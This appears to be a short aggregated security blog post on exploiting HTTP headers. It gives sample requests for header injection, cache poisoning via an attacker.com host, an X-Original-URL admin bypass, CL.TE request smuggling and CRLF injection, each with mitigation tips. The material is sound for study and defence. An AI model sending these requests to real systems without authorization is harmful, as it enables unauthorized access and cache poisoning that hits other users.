Listen to this Post
HTTP headers are a goldmine for security researchers and bug bounty hunters. From basic misconfigurations to advanced exploitation techniques, understanding how to manipulate headers can lead to significant vulnerabilities. This guide explores methods like custom header injection, cache poisoning, and reverse proxy misconfigurations.
Read the full guide here: Exploiting HTTP Headers
You Should Know:
1. Custom Header Injection
Attackers can inject malicious headers to bypass security controls or manipulate server behavior. Example:
GET / HTTP/1.1 Host: example.com X-Forwarded-For: 127.0.0.1 User-Agent: Malicious-Browser
Impact: Bypassing IP restrictions, session fixation, or SSRF.
2. Cache Poisoning via Headers
Manipulating caching headers (Cache-Control, Vary) can poison web caches, serving malicious content to users.
GET / HTTP/1.1 Host: victim.com X-Forwarded-Host: attacker.com
Mitigation: Ensure proper `Vary` header usage and cache validation.
3. Reverse Proxy Misconfigurations
Misconfigured proxies may forward internal headers (X-Internal, X-Accel-Redirect), exposing sensitive data.
curl -H "X-Original-URL: /admin" http://target.com
Defense: Strip unnecessary internal headers at the proxy level.
4. HTTP Request Smuggling
Manipulating `Content-Length` and `Transfer-Encoding` headers can lead to request smuggling:
POST / HTTP/1.1 Host: target.com Content-Length: 6 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1
Detection: Use tools like Burp Suite or OWASP ZAP.
5. Security Header Bypasses
Missing or misconfigured security headers (CSP, HSTS) can lead to XSS or MITM attacks.
curl -I http://example.com | grep -i "strict-transport-security"
Fix: Enforce `Strict-Transport-Security` and `Content-Security-Policy`.
What Undercode Say:
HTTP headers are often overlooked but can be a critical attack surface. Always test for:
– Header Injection (CRLF, Host override)
– Cache Deception (via X-Forwarded-Host)
– Proxy Misconfigurations (internal IP leaks)
– Request Smuggling (CL.TE or TE.CL attacks)
Commands for Testing:
Check security headers curl -I https://example.com Test for CRLF injection curl -H "User-Agent: \r\nX-Malicious: true" http://test.com Detect reverse proxy issues nmap -p 80,443 --script http-headers target.com
Tools to Use:
- Burp Suite (Manual testing)
- Nmap (Header scanning)
- OWASP ZAP (Automated checks)
Expected Output:
A detailed report on HTTP header vulnerabilities, including exploitation techniques, mitigation steps, and practical commands for security testing.
References:
Reported By: Yes We – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
